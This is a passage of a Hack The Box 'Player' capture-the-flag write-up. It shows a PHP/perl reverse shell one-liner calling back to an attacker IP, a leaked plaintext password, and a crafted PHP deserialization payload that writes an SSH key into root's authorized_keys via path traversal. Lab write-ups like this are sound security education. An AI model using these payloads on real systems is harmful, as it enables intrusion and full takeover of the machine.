<p>I didn’t see a <code class="language-plaintext highlighter-rouge">peter</code> user in <code class="language-plaintext highlighter-rouge">/etc/passwd</code> so the next logical place to try the credentials is on the <code class="language-plaintext highlighter-rouge">dev.player.htb</code> site. I can successfully log in with <code class="language-plaintext highlighter-rouge">peter / CQXpm\z)G5D#%S$y=</code>. I get a blank IDE page and I find a single project.</p>

<p><img src="/assets/images/htb-writeup-player/codiad.png" alt="" /></p>

<p><img src="/assets/images/htb-writeup-player/codiad_projects.png" alt="" /></p>

<p>The path of the project doesn’t exist and errors out when I try to open it.</p>

<p><img src="/assets/images/htb-writeup-player/codiad_error.png" alt="" /></p>

<p>If I try to create a new project with an absolute path of <code class="language-plaintext highlighter-rouge">/tmp</code> I get the following error:</p>

<p><img src="/assets/images/htb-writeup-player/codiad_abspath.png" alt="" /></p>

<p>I just found the path for one of website: <code class="language-plaintext highlighter-rouge">/var/www/demo</code>. If I can create PHP files in there I might be able to get RCE. I’ll create a new project using <code class="language-plaintext highlighter-rouge">/var/www/demo/snowscan</code> as path:</p>

<p><img src="/assets/images/htb-writeup-player/codiad_abspath2.png" alt="" /></p>

<p>To test PHP execution I just call <code class="language-plaintext highlighter-rouge">phpinfo()</code> and see that it works:</p>

<p><img src="/assets/images/htb-writeup-player/codiad_phpinfo.png" alt="" /></p>

<p><img src="/assets/images/htb-writeup-player/phpinfo.png" alt="" /></p>

<p>Next, I’ll get a shell using perl with the following PHP code:</p>

<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">&lt;?php</span> <span class="nb">system</span><span class="p">(</span><span class="s1">'perl -e \'use Socket;$i="10.10.14.11";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,"&gt;&amp;S");open(STDOUT,"&gt;&amp;S");open(STDERR,"&gt;&amp;S");exec("/bin/sh -i");};\''</span><span class="p">);</span> <span class="cp">?&gt;</span>
</code></pre></div></div>

<p>Finally, I get a shell as <code class="language-plaintext highlighter-rouge">www-data</code>.</p>

<p><img src="/assets/images/htb-writeup-player/shell.png" alt="" /></p>

<h2 id="privesc">Privesc</h2>

<p>Now it’s time to get root. I see some weird script running but I can’t read <code class="language-plaintext highlighter-rouge">dothis.sh</code> so I don’t know what it does.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root       990  0.0  0.0   4456   680 ?        Ss   01:23   0:00 /bin/sh -c /etc/init.d/dothis.sh
root       991  0.0  0.4  13896  4392 ?        S    01:23   0:03 /bin/bash /etc/init.d/dothis.sh

www-data@player:/$ more /etc/init.d/dothis.sh
/etc/init.d/dothis.sh: Permission denied
</code></pre></div></div>

<p>I ran LinEnum next but didn’t find anything interesting. Next up: checking for cronjobs starting processes. I’ll use <a href="https://github.com/DominicBreuker/pspy">pspy</a> to watch running processes and new ones created. I quickly identify a process running as root: <code class="language-plaintext highlighter-rouge">/usr/bin/php /var/lib/playbuff/buff.php</code></p>

<p><img src="/assets/images/htb-writeup-player/pspy.png" alt="" /></p>

<p>The content of the file is shown here:</p>

<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">&lt;?php</span>
<span class="k">include</span><span class="p">(</span><span class="s2">"/var/www/html/launcher/dee8dc8a47256c64630d803a4c40786g.php"</span><span class="p">);</span>
<span class="kd">class</span> <span class="nc">playBuff</span>
<span class="p">{</span>
	<span class="k">public</span> <span class="nv">$logFile</span><span class="o">=</span><span class="s2">"/var/log/playbuff/logs.txt"</span><span class="p">;</span>
	<span class="k">public</span> <span class="nv">$logData</span><span class="o">=</span><span class="s2">"Updated"</span><span class="p">;</span>

	<span class="k">public</span> <span class="k">function</span> <span class="n">__wakeup</span><span class="p">()</span>
	<span class="p">{</span>
		<span class="nb">file_put_contents</span><span class="p">(</span><span class="k">__DIR__</span><span class="mf">.</span><span class="s2">"/"</span><span class="mf">.</span><span class="nv">$this</span><span class="o">-&gt;</span><span class="n">logFile</span><span class="p">,</span><span class="nv">$this</span><span class="o">-&gt;</span><span class="n">logData</span><span class="p">);</span>
	<span class="p">}</span>
<span class="p">}</span>
<span class="nv">$buff</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">playBuff</span><span class="p">();</span>
<span class="nv">$serialbuff</span> <span class="o">=</span> <span class="nb">serialize</span><span class="p">(</span><span class="nv">$buff</span><span class="p">);</span>
<span class="nv">$data</span> <span class="o">=</span> <span class="nb">file_get_contents</span><span class="p">(</span><span class="s2">"/var/lib/playbuff/merge.log"</span><span class="p">);</span>
<span class="k">if</span><span class="p">(</span><span class="nb">unserialize</span><span class="p">(</span><span class="nv">$data</span><span class="p">))</span>
<span class="p">{</span>
	<span class="nv">$update</span> <span class="o">=</span> <span class="nb">file_get_contents</span><span class="p">(</span><span class="s2">"/var/lib/playbuff/logs.txt"</span><span class="p">);</span>
	<span class="nv">$query</span> <span class="o">=</span> <span class="nf">mysqli_query</span><span class="p">(</span><span class="nv">$conn</span><span class="p">,</span> <span class="s2">"update stats set status='</span><span class="nv">$update</span><span class="s2">' where id=1"</span><span class="p">);</span>
	<span class="k">if</span><span class="p">(</span><span class="nv">$query</span><span class="p">)</span>
	<span class="p">{</span>
		<span class="k">echo</span> <span class="s1">'Update Success with serialized logs!'</span><span class="p">;</span>
	<span class="p">}</span>
<span class="p">}</span>
<span class="k">else</span>
<span class="p">{</span>
	<span class="nb">file_put_contents</span><span class="p">(</span><span class="s2">"/var/lib/playbuff/merge.log"</span><span class="p">,</span><span class="s2">"no issues yet"</span><span class="p">);</span>
	<span class="nv">$update</span> <span class="o">=</span> <span class="nb">file_get_contents</span><span class="p">(</span><span class="s2">"/var/lib/playbuff/logs.txt"</span><span class="p">);</span>
	<span class="nv">$query</span> <span class="o">=</span> <span class="nf">mysqli_query</span><span class="p">(</span><span class="nv">$conn</span><span class="p">,</span> <span class="s2">"update stats set status='</span><span class="nv">$update</span><span class="s2">' where id=1"</span><span class="p">);</span>
	<span class="k">if</span><span class="p">(</span><span class="nv">$query</span><span class="p">)</span>
	<span class="p">{</span>
		<span class="k">echo</span> <span class="s1">'Update Success!'</span><span class="p">;</span>
	<span class="p">}</span>
<span class="p">}</span>
<span class="cp">?&gt;</span>
</code></pre></div></div>

<p>There is a subtle deserialization vulnerability here. The contents of <code class="language-plaintext highlighter-rouge">merge.log</code> are deserialized then the MySQL stats table is updated. The <code class="language-plaintext highlighter-rouge">telegen</code> is the owner of the file so it should be possible to get control of the <code class="language-plaintext highlighter-rouge">logFile</code> and <code class="language-plaintext highlighter-rouge">logData</code> variables in the <code class="language-plaintext highlighter-rouge">PlayBuff</code> class and write arbitrary data to any file I want to as root.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>www-data@player:/var/lib/playbuff$ ls -l
total 16
-rwx---r-- 1 root    root    878 Mar 24 17:19 buff.php
-rw-r--r-- 1 root    root     15 Jul  9 07:34 error.log
-r-------- 1 root    root     14 Mar 24 16:54 logs.txt
-rw------- 1 telegen telegen  13 Jul  9 07:34 merge.log
</code></pre></div></div>

<p>First I’ll <code class="language-plaintext highlighter-rouge">su</code> to user <code class="language-plaintext highlighter-rouge">telegen</code> and specify that I want a Bash shell and not that lshell restricted shell:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>www-data@player:/var/lib/playbuff$ su -s /bin/bash telegen
Password: 
telegen@player:/var/lib/playbuff$ id
uid=1000(telegen) gid=1000(telegen) groups=1000(telegen),46(plugdev)
</code></pre></div></div>

<p>For the serialized payload, I will write my SSH public to root’s <code class="language-plaintext highlighter-rouge">authorized_keys</code> then I should be able to log in as root:</p>
<ul>
  <li>Object class: playBuff (it contains 2 properties)</li>
  <li>logFile: <code class="language-plaintext highlighter-rouge">../../../../../../root/.ssh/authorized_keys</code></li>
  <li>logData: content of my SSH public key</li>
</ul>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>O:8:"playBuff":2:{s:7:"logFile";s:43:"../../../../../../root/.ssh/authorized_keys";s:7:"logData";s:399:"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC+SZ75RsfVTQxRRbezIJn+bQgNifXvjMWfhT1hJzl/GbTbykFtGPTwuiA5NAcPKPG25jkQln3J8Id2ngapRuW8i8OvM+QBuihsM9wLxu+my0JhS/aNHTvzJF0uN1XkvZj/BkbjUpsF9k6aMDaFoaxaKBa7ST2ZFpxlbu2ndmoB+HuvmeTaCmoY/PsxgDBWwd3GiRNts2HOiu74DEVt0hHbJ7kwhkR+l0+6VS74s+7SjP+N1q+oih83bjwM8ph+9odqAbh6TGDTbPX2I+3lTzCUeGS9goKZe05h/YtB2U2VbH1pxJZ1rfR1Sp+SBS+zblO9MUxvbzQoJTHpH2jeDg89 root@ragingunicorn";}
</code></pre></div></div>

<p>I wait a bit for the cronjob to run then I’m able to SSH in as root after my public key has been written into root’s SSH directory:</p>

<p><img src="/assets/images/htb-writeup-player/root.png" alt="" /></p>

        
      </section>

      <footer class="page__meta">
        
        
  


  
  
  

  <p class="page__taxonomy">
    <strong><i class="fas fa-fw fa-tags" aria-hidden="true"></i> Tags: </strong>
    <span itemprop="keywords">
    
      
      
      <a href="/tags/#codiad" class="page__taxonomy-item" rel="tag">codiad</a><span class="sep">, </span>
    
      
      
      <a href="/tags/#cronjob" class="page__taxonomy-item" rel="tag">cronjob</a><span class="sep">, </span>
    
      
      
      <a href="/tags/#ffmpeg" class="page__taxonomy-item" rel="tag">ffmpeg</a><span class="sep">, </span>
    
      
      
      <a href="/tags/#jwt" class="page__taxonomy-item" rel="tag">jwt</a><span class="sep">, </span>
    
      
      
      <a href="/tags/#lshell" class="page__taxonomy-item" rel="tag">lshell</a><span class="sep">, </span>
    
      
      
      <a href="/tags/#openssh-xauth" class="page__taxonomy-item" rel="tag">openssh xauth</a><span class="sep">, </span>
    
      
      
      <a href="/tags/#php-deserialization" class="page__taxonomy-item" rel="tag">php deserialization</a><span class="sep">, </span>
    
      
      
      <a href="/tags/#php" class="page__taxonomy-item" rel="tag">php</a><span class="sep">, </span>
    
      
      
      <a href="/tags/#pspy" class="page__taxonomy-item" rel="tag">pspy</a><span class="sep">, </span>
    
      
      
      <a href="/tags/#vhosts" class="page__taxonomy-item" rel="tag">vhosts</a>
    
    </span>
  </p>




  


  
  
  

  <p class="page__taxonomy">
    <strong><i class="fas fa-fw fa-folder-open" aria-hidden="true"></i> Categories: </strong>
    <span itemprop="keywords">
    
      
      
      <a href="/categories/#hackthebox" class="page__taxonomy-item" rel="tag">hackthebox</a><span class="sep">, </span>
    
      
      
      <a href="/categories/#infosec" class="page__taxonomy-item" rel="tag">infosec</a>
    
    </span>
  </p>


        
          <p class="page__date"><strong><i class="fas fa-fw fa-calendar-alt" aria-hidden="true"></i> Updated:</strong> <time datetime="2020-01-18T00:00:00+01:00">January 18, 2020</time></p>
        
      </footer>

      

      
  <nav class="pagination">
    
      <a href="/htb-writeup-bitlab/" class="pagination--pager" title="Bitlab - Hack The Box
">Previous</a>
    
    
      <a href="/htb-writeup-ai/" class="pagination--pager" title="AI - Hack The Box
">Next</a>
    
  </nav>

    </div>

    
  </article>

  
</div>

    </div>

    

    <div class="page__footer">
      <footer>
        <!-- start custom footer snippets -->

<!-- end custom footer snippets -->
        <div class="page__footer-follow">
  <ul class="social-icons">
    

    

    <li><a href="/feed.xml"><i class="fas fa-fw fa-rss-square" aria-hidden="true"></i> Feed</a></li>
  </ul>
</div>

<div class="page__footer-copyright">&copy; 2022 HackCommander</div>

      </footer>
    </div>

    
  <script src="/assets/js/main.min.js"></script>
  <script data-search-pseudo-elements defer src="https://use.fontawesome.com/releases/v5.7.1/js/all.js" integrity="sha384-eVEQC9zshBn0rFj4+TU78eNA19HMNigMviK/PU/FFjLXqa/GKPgX58rvt5Z8PLs7" crossorigin="anonymous"></script>








  </body>
</html>
